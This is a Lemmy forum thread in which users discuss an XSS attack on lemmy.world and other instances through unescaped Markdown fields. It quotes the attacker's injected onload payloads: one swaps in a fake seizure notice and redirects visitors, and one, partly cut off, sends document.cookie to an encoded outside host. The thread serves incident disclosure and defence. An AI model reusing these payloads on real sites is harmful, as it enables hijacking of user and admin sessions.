this post was submitted on 10 Jul 2023
396 points (99.7% liked)

Lemmy

13135 readers
5 users here now

Everything about Lemmy; bugs, gripes, praises, and advocacy.

For discussion about the lemmy.ml instance, go to !meta@lemmy.ml.

founded 5 years ago
MODERATORS
nutomic@lemmy.ml
396
(URGENT) Lemmy has an XSS vulnerability in the tagline, the sidebar and in the legal information field (sh.itjust.works)
submitted 2 years ago* (last edited 2 years ago) by AlmightySnoo@sh.itjust.works to c/lemmy@lemmy.ml
126 comments fedilink hide all child comments
 

DO NOT OPEN THE "LEGAL" PAGE

lemmy.world is a victim of an XSS attack right now and the hacker simply injected a JavaScript redirection into the sidebar.

It appears the Lemmy backend does not escape HTML in the main sidebar. Not sure if this is also true for community sidebars.

EDIT:

the exploit is also in the tagline that appears on top of the main feed for status updates, like the following one for SDF Chatter:

EDIT 2:

The legal information field also has that exploit, so that when you go to the "Legal" page it shows the HTML unescaped, but fortunately (for now) he's using double-quotes.

"legal_information":" ![\" onload=\"if(localStorage.getItem(`h`) != `true`){document.body.innerHTML = `\u003Ch1\u003ESite has been seized by Reddit for copyright infringment\u003C\u002Fh1\u003E`; setTimeout(() =\u003E {window.location.href = `https:\u002F\u002Flemmy.world\u002Fpictrs\u002Fimage\u002F7aa772b7-9416-45d1-805b-36ec21be9f66.mp4`}, 10000)}\"](https:\u002F\u002Flemmy.world\u002Fpictrs\u002Fimage\u002F66ca36df-4ada-47b3-9169-01870d8fb0ac.png \"lw\")
top 50 comments
sorted by: hot top controversial new old
[–] muddybulldog@mylemmy.win 76 points 2 years ago* (last edited 2 years ago) (3 children)

Not sure if it's actually XSS. Lemmy.world did have an admin account compromise so it could've been done locally.

It actually looks like it may be being propagated via comments. I received more than a handful from lemmy.world and it appears they were in the process of deleting them before they went dark. I nuked the remaining ones by hand but you can see that lemmy.blahaj.zone still has the same few remaining... https://lemmy.blahaj.zone/search?q=onload%3D&type=All&listingType=All&page=1&sort=TopAll

[–] AlmightySnoo@sh.itjust.works 53 points 2 years ago* (last edited 2 years ago) (8 children)

Wow you're right, so it's not just sidebars, it's the whole Markdown parser:

He encoded the URL in ASCII.

[–] muddybulldog@mylemmy.win 25 points 2 years ago* (last edited 2 years ago) (1 children)

The actually full comment code that I can see in the database is quite disquieting, cookie stealing:

onload="fetch(String.fromCharCode(104,116,116,112,115, 58,47,47,122,101,108,101,110,115,107,121,46,122,105,112,47,115,97,118,101,47) +btoa(document.cookie+(document.getElementById(String.fromCharCode(110,97,118,65,100,109,105,110))

[–] hawkwind@lemmy.management 20 points 2 years ago (1 children)

So any comment or post?

[–] AlmightySnoo@sh.itjust.works 26 points 2 years ago* (last edited 2 years ago) (1 children)

Yes, so you don't even need to compromise an admin account

[–] TWeaK@lemm.ee 17 points 2 years ago (1 children)

So maybe the admin account was compromised as a result of the hack, rather than the other way around?

[–] Cyyy@lemmy.ml 14 points 2 years ago (2 children)

the hacker could use a cookie stealer injected by the xss to steal the admin account.

[–] erre@feddit.win 10 points 2 years ago

I think that's right on the money.

https://lemmy.sdf.org/comment/850269

load more comments (1 replies)
load more comments (5 replies)
[–] OreganoChampion@sh.itjust.works 25 points 2 years ago* (last edited 2 years ago)

I posted this before... But as a Mod for the Mildly Infuriating And Lemmy Shitposting community; 1 hour before the attack happened I received the following message from the admin that was compromised:

A long with that, yeah I saw that message from a member reposting an image with what appeared to code inside it.

I can't get on Lemmy.World to take a screenshot but I wasn't sure what it was I just removed the comment, but it definitely looked like code injection.

[–] urda@mastodon.social 9 points 2 years ago (2 children)

@muddybulldog @AlmightySnoo It seems odd that like, beehaw, lemmy.world, and blahaj all went down together.

[–] BlackRose@slrpnk.net 19 points 2 years ago (1 children)

Beehaw did not get hacked, they went offline until it is fixed.

[–] Rentlar@lemmy.ca 11 points 2 years ago

That checks out, beehaw would take an abundance of caution.

[–] muddybulldog@mylemmy.win 9 points 2 years ago (2 children)

I restored a database snapshot from a couple hours ago. That jives with what I'm seeing.

load more comments (2 replies)
[–] wetnoodle@sh.itjust.works 53 points 2 years ago

lemmy.blahaj.zone is affected

[–] Dirk@lemmy.ml 51 points 2 years ago (25 children)

Not sanitizing user input is plain stupid. There is no excuse. Ever.

load more comments (25 replies)
[–] Max_P@lemmy.max-p.me 37 points 2 years ago* (last edited 2 years ago) (3 children)

Something's weird about it because I tried copy pasting it into my instance's sidebar and nothing happened. It gets quoted properly, at least on the official 0.18.1 Docker.

The rendered HTML looks like this:

<img src="https://lemmy.max-p.me/pictrs/image/d3667ced-4ea5-4fbf-b229-461c68192570.jpeg" alt="&quot; onload=&quot;setTimeout(()=003E{alert('oh no')},3000)&quot;" title="lw"></p>

E: Found it! Requires emojis as per this PR

If your instance doesn't have any custom emojis, you're safe. If not, log out immediately and wait for the instance to be updated. Anyone can exploit this as long as long as there's any custom emojis defined.

[–] AlmightySnoo@sh.itjust.works 27 points 2 years ago* (last edited 2 years ago) (1 children)

Have you tried sending the API request for the sidebar edit yourself? Maybe the escaping is only done at the UI level (which would be EXTREMELY bad).

EDIT: no, couldn't find anything via comments

[–] Max_P@lemmy.max-p.me 25 points 2 years ago* (last edited 2 years ago) (9 children)

I've even checked in the database directly - the markdown exploit is pasted exactly as is from the JSON I shared here (passed through jq to strip the JSON-encoding), with the only difference being I replaced lemonparty with example.com.

It renders, I get the image, but it's escaped properly. Both the affected instances so far are running some RC / version number shows a git commit, so maybe there's something weird about the build config that results in slightly different parsing.

I've very puzzled about it. I tried it in sidebar, I tried it as taglines (where lemmy.world's exploit was), I tried it as a post, I tried it as a comment. All of them result in the same correct output. I've even added the trailing space at the end in case it matters.

I'm open if you have more ideas.

E: database:

load more comments (9 replies)
[–] Oraksus@programming.dev 17 points 2 years ago* (last edited 2 years ago)

Just a guess I haven't looked at the code. There is probably front end validation, but not back end validation, so forming your own http call probably allows any input.

load more comments (1 replies)
[–] Mookulator@wirebase.org 24 points 2 years ago (2 children)

Lemmy.World is back up and the admin who got hacked is claiming it’s fixed. However, REMAIN CAUTIOUS. No other admins have confirmed that it’s fixed. Could easily be the hacker pretending to be the admin.

[–] muddybulldog@mylemmy.win 14 points 2 years ago (1 children)

That post is two hours old and posted to TelAviv, of all places. I'm not so much trusting on that.

[–] Mookulator@wirebase.org 7 points 2 years ago (1 children)

You’re right. It only just came up in my feed but it’s old. I’ll take my comment down to avoid confusion.

load more comments (1 replies)
[–] PixelPassport@lemm.ee 7 points 2 years ago

Didn't we already do that once?

[–] kobra@lemm.ee 20 points 2 years ago

😬

[–] ugh@lemm.ee 19 points 2 years ago (1 children)

Can someone ELI5 what this means? Do users need to be vigilant? Is information or malware being passed around? What can we expect going forward?

[–] Mookulator@wirebase.org 17 points 2 years ago* (last edited 2 years ago) (2 children)

Lots of discussion happening over on kbin. It’s not clear if any user data has been stolen but some commenters are doubtful. The most important thing is we should not trust links on that site as they could be malware.

https://kbin.social/m/main@sh.itjust.works/t/168272/PSA-LEMMY-WORLD-IS-COMPROMISED/newest

[–] DrQuint@lemmy.ml 10 points 2 years ago

I think this is the perfect opportunity to plug to everyone the concept of password managers and other basic web security concepts.

load more comments (1 replies)
[–] calculuschild@lemm.ee 14 points 2 years ago (1 children)

GitHub issue has been reported here for those interested: https://github.com/LemmyNet/lemmy-ui/issues/1895

load more comments (1 replies)
[–] solrize@lemmy.ml 13 points 2 years ago (1 children)

To change the main sidebar they apparently first got control of an admin account, oops.

[–] AlmightySnoo@sh.itjust.works 15 points 2 years ago (1 children)

yeah an admin account was compromised, but the sidebar vulnerability is serious too, just imagine if the community sidebars have this problem too

load more comments (1 replies)
[–] erre@feddit.win 12 points 2 years ago

Looks like lemmy.blahaj.zone is back

https://lemmy.blahaj.zone/post/766402

[–] Ducks@ducks.dev 9 points 2 years ago

If there's truly XSS vulnerabilities in lemmy that would be really bad. It's one of the first things an attacker will try and it's so easy to protect against.

load more comments
view more: next ›